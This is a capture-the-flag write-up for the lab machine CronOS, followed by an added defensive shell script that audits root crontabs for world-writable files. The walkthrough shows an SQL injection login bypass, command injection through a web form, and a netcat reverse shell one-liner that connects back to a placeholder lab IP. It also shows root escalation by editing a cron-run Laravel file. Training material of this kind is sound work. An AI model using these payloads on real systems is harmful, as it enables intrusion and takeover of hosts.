
CronOS

13th October 2017 / Document No D17.100.18
Prepared By: Alexander Reid (Arrexel)
Machine Author: ch4p
Difficulty: Medium
Classification: Official

Page 1 / 7
SYNOPSIS
CronOS focuses mainly on different vectors for enumeration and also emphasises the risks
associated with adding world-writable files to the root crontab. This machine also includes an
introductory-level SQL injection vulnerability.

Skills Required

● Basic knowledge of Linux
● Enumerating ports and services
● Enumerating DNS

Skills Learned

● SQL Injection
● Command injection
● Exploiting cron jobs

Enumeration

Nmap

Nmap reveals an OpenSSH server, a DNS server and an Apache server. Attempting to view the
website reveals only the default Apache page.

Dig

Although the initial domain name must be guessed (cronos.htb), it is possible to enumerate the
remaining subdomains by doing a zone transfer. This can be accomplished with the command
dig axfr @10.10.10.13 cronos.htb after adding cronos.htb to the /etc/hosts file.

After adding admin.cronos.htb to the /etc/hosts file and browsing to it, an administrator login
page is presented.

Exploitation

Login
After some trial and error, it appears that the Username field is vulnerable to SQL injection. By
commenting out the rest of the statement with the username admin'-- - the login form is
bypassed.

Welcome

It does not take long to figure out that the welcome.php page is vulnerable to command
injection. Many different methods work here; the simplest is likely just using a semicolon to
append additional commands. However, script execution stops after the traceroute is run.

By intercepting the response in Burp Suite, it is possible to modify the command entirely.

After removing the host variable, command injection is now trivial. Replace traceroute with the
desired command and send the request. Note that URL encoding the command is required in
some cases. Use the command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LAB IP>
<PORT>| >/tmp/f to connect to a local nc listener, which can be started by using the command nc
-nvlp <PORT>.

The user flag can be obtained from ​/home/noulis/user.txt

Privilege Escalation

LinEnum: ​https://github.com/rebootuser/LinEnum

Running LinEnum generates a fairly large list of information. One thing that stands out is the root
crontab, which runs the schedule() function in /var/www/laravel/app/console/Kernel.php.
Modifying the function allows for command execution as root by the scheduler system.

This can be used to modify other files to simplify obtaining a root shell, however in this case
obtaining the flag is all that is required.
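As an added defensive example, not part of this writeup: a POSIX shell audit that lists what a system crontab runs and reports which of those files are world-writable, both the files named directly on a cron line and, as with Kernel.php here, files under an application tree that the scheduled entry point loads indirectly. The demo tree, the crontab entries and the cron.d file name are constructed for the example; only the Kernel.php path mirrors the writeup.

```shell
#!/bin/sh
# Added example, not from the writeup: audit what a root crontab runs for
# world-writable files, the misconfiguration this machine demonstrates.
# True when $1 is a regular file with the others-write bit set.
world_writable() {
    [ -n "$(find "$1" -prune -type f -perm -002 2>/dev/null)" ]
}
# Print every world-writable file named by an absolute path in the command field
# of a system-format crontab (min hour dom mon dow user command...). Always
# returns 0; callers inspect the output.
find_world_writable_cron_targets() {
    set -f   # no globbing while the command field is split into tokens
    # Skip comments, blank lines and environment assignments (PATH=..., MAILTO=...)
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$1" |
    while read -r _min _hour _dom _mon _dow _user cmd; do
        for tok in $cmd; do
            case "$tok" in
                /*) if world_writable "$tok"; then echo "$tok"; fi ;;
            esac
        done
    done
    set +f
}
# A cron line only names its entry point; the file edited on this machine
# (app/console/Kernel.php) is loaded by that entry point indirectly, so the
# application tree must be walked too. Prints regular files others can write.
find_world_writable_under() {
    find "$1" -type f -perm -002
}
# Constructed demo tree mirroring the writeup's paths; echoes its root directory.
build_demo_tree() {
    d=$(mktemp -d); cron="$d/etc/cron.d/laravel"
    mkdir -p "$d/bin" "$d/var/www/laravel/app/console" "$d/etc/cron.d"
    printf '#!/bin/sh\n' > "$d/bin/backup.sh";  chmod 0755 "$d/bin/backup.sh"
    printf '#!/bin/sh\n' > "$d/bin/cleanup.sh"; chmod 0777 "$d/bin/cleanup.sh"   # bad
    printf '<?php\n' > "$d/var/www/laravel/artisan"; chmod 0755 "$d/var/www/laravel/artisan"
    printf '<?php\n' > "$d/var/www/laravel/app/console/Kernel.php"
    chmod 0666 "$d/var/www/laravel/app/console/Kernel.php"                       # bad, indirect
    printf 'PATH=/usr/bin:/bin\n# constructed sample crontab\n' > "$cron"
    printf '*/5 * * * * root %s/bin/backup.sh\n' "$d" >> "$cron"
    printf '* * * * * root %s/bin/cleanup.sh --quiet\n' "$d" >> "$cron"
    printf '* * * * * root /usr/bin/php %s/var/www/laravel/artisan schedule:run\n' "$d" >> "$cron"
    echo "$d"
}
demo=$(build_demo_tree)
find_world_writable_cron_targets "$demo/etc/cron.d/laravel"   # prints .../bin/cleanup.sh
find_world_writable_under "$demo/var/www"                    # prints .../app/console/Kernel.php
rm -rf "$demo"
```

On a real host, point the first function at /etc/crontab and each file in /etc/cron.d, and the second at the web root the scheduler's entry point lives in.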
